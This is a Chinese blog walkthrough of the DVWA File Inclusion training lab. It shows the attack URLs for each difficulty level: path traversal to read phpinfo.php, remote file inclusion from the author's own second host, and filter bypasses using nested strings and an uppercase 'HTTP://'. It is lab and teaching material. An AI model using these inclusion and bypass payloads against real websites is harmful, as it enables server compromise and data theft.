【DVWA全攻略】DVWA File Inclusion实验

image.png

正常功能

读取并显示php文件里的内容
image.png

Low难度

这里可以观察到文件包含链接的格式

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=file3.php

image.png

我们可以尝试page=后面做点文章

代码分析

这里没有对输入进行任何过滤,因此存在很严重的安全漏洞,这里可以尽情的脑洞大开。

访问服务器不存在的文件

随便访问一个不存在的文件,如hackyou.php

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=hackyou.php

image.png

这里看到,可以报出文件所在的目录

Warning: include(hackyou.php): failed to open stream: No such file or directory in /www/wwwroot/192.168.47.129/dvwa/vulnerabilities/fi/index.php on line 36
 ​
 Warning: include(): Failed opening 'hackyou.php' for inclusion (include_path='.:/www/server/php/56/lib/php:../../external/phpids/0.6/lib/') in /www/wwwroot/192.168.47.129/dvwa/vulnerabilities/fi/index.php on line 36

访问服务器存在的文件

尝试使用相对路径访问一些正常不展示的内容

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=../../phpinfo.php

image.png

image.png

访问远程服务器文件

填入自己服务器的php文件,看看效果

image.png

访问

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=http://192.168.47.128/test/test.php

发现可以显示

image.png

这里我们尝试让它显示我们服务器的php信息

访问

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=http://192.168.47.128/test/test.php

image.png

这里只是脑洞大开,想用这个来钓鱼。
一般情况,文件报告漏洞是用来提权或者下载数据使用的

Medium难度

代码分析

发现这里只是过滤了http://https://../..\,将这些内容替换为空

组合方式构造

我们可以通过将组合的方式,

hthttp://tp://这样过滤后为http://

..././..././这样过滤后为../

然后效果就和之前Low难度一样了

访问服务器存在的文件

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=..././..././phpinfo.php

image.png

访问远程服务器文件

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.47.128/test/test.php

image.png

大小写绕过

通过代码分析,我们发现仅过滤了小写

这里我们可以通过将修改大小写,尝试绕过

访问远程服务器文件

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=HTTP://192.168.47.128/test/test.php

image.png

其他失败的思路:URL加密绕过

除了上述利用过滤机制,这里尝试一下通过url加密的方式进行尝试

image.png

http://192.168.47.129/dvwa/vulnerabilities/fi/?page=..%2F..%2Fphpinfo.phpphpinfo.php

image.png

发现并没有什么卵用,目测是url加密解析最后还是要经过服务器端的处理,因此不能通过这种方式进行绕过

High难度

代码分析

Impossible难度里面只允许访问include.php同一目录的file1.phpfile2.phpfile3.php

该难度下只能尝试通过其他漏洞修改这三个文件内容才行

© 版权声明
THE END
喜欢就支持一下吧
点赞332赞赏
分享
评论 抢沙发

请登录后发表评论